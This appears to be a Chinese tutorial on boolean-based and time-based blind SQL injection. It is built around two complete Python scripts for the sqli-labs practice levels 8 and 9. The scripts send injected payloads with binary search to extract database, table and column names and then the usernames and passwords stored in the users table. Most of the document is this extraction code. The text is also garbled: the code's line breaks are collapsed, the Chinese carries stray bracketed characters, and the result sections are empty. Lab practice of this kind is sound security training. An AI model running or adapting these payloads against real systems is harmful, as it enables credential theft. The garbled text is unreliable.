一、布爾盲注

布爾盲注（Boolean-based Blind SQL Injection）是一種SQL注入技術(shù)，用于在應(yīng)用程序不直接顯示數(shù)據(jù)庫查詢結(jié)果的情況下，通過構(gòu)造特定的SQL查詢并根據(jù)頁面返回的不同結(jié)果來推測數(shù)據(jù)庫中的信息。這種方法依賴于SQL查詢的結(jié)果是否為真或假，進(jìn)而推斷出數(shù)據(jù)庫中的具體信息。

案例為sqlilabs中的第八關(guān)，采用二分查找

python腳本：

import requests
def get_database(URL):# 獲取數(shù)據(jù)庫名稱s = ""for i in range(1, 10):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and greatest(ascii(substr(database(),{i},1)),{mid})={mid} -- "}  # 相當(dāng)于第一個字符<={mid}條件判斷為真res = requests.get(url=URL, params=payload)if "You are in" in res.text:high = midmid = (low + high) // 2else:low = mid + 1mid = (low + high) // 2s += chr(mid)print("數(shù)據(jù)庫名稱:" + s)def get_table(URL):# 獲取表名稱s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid} -- "}res = requests.get(url=URL, params=payload)if "You are in" in res.text:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("表的名稱:" + s)def get_column(URL):# 獲取管理員的字段名稱s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid} -- "}res = requests.get(url=URL, params=payload)if "You are in" in res.text:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users表的列:" + s)def get_result(URl):# 獲取用戶名和密碼信息s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid} -- "}res = requests.get(url=URL, params=payload)if "You are in" in res.text:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users表具體數(shù)據(jù):" + s)if __name__ == '__main__':URL = "http://127.0.0.1/sqlilabs/Less-8/index.php"get_database(URL)get_table(URL)get_column(URL)get_result(URL)

運(yùn)行結(jié)果

二、時間盲注

時間盲注（Time-based Blind SQL Injection）是一種SQL注入技術(shù)，用于在應(yīng)用程序沒有直接回顯數(shù)據(jù)庫查詢結(jié)果的情況下，通過構(gòu)造特定的SQL查詢來推測數(shù)據(jù)庫中的信息。這種方法依賴于數(shù)據(jù)庫處理查詢時產(chǎn)生的延遲響應(yīng)來判斷條件的真假。

案例為sqlilabs中的第九關(guān)，同樣為二分查找

python腳本

import requests
import datetimedef get_database(URL):# 獲取數(shù)據(jù)庫名稱s = ""for i in range(1, 10):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((greatest(ascii(substr(database(),{i},1)),{mid})={mid}),sleep(3),1) -- "}  # 相當(dāng)于第一個字符<={mid}條件判斷為真start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:high = midmid = (low + high) // 2else:low = mid + 1mid = (low + high) // 2s += chr(mid)print("數(shù)據(jù)庫名稱:" + s)def get_table(URL):# 獲取表名稱s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=\"security\"),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("表的名稱:" + s)def get_column(URL):# 獲取管理員的字段名稱s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=\"security\" and table_name=\"users\"),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users表的列:" + s)def get_result(URl):# 獲取用戶名和密碼信息s = ""for i in range(1, 32):low = 32high = 128mid = (low + high) // 2while (high > low):payload = {"id": f"1' and if((ascii(substr((select group_concat(username,0x3e,password) from users),{i},1))>{mid}),sleep(3),1) -- "}start = datetime.datetime.now()res = requests.get(url=URL, params=payload)end = datetime.datetime.now()if (end - start).seconds >= 3:low = mid + 1mid = (low + high) // 2else:high = midmid = (low + high) // 2s += chr(mid)print("users中的具體數(shù)據(jù):" + s)if __name__ == '__main__':URL = "http://127.0.0.1/sqlilabs/Less-9/index.php"# get_database(URL)get_table(URL)# get_column(URL)# get_result(URL)

運(yùn)行結(jié)果：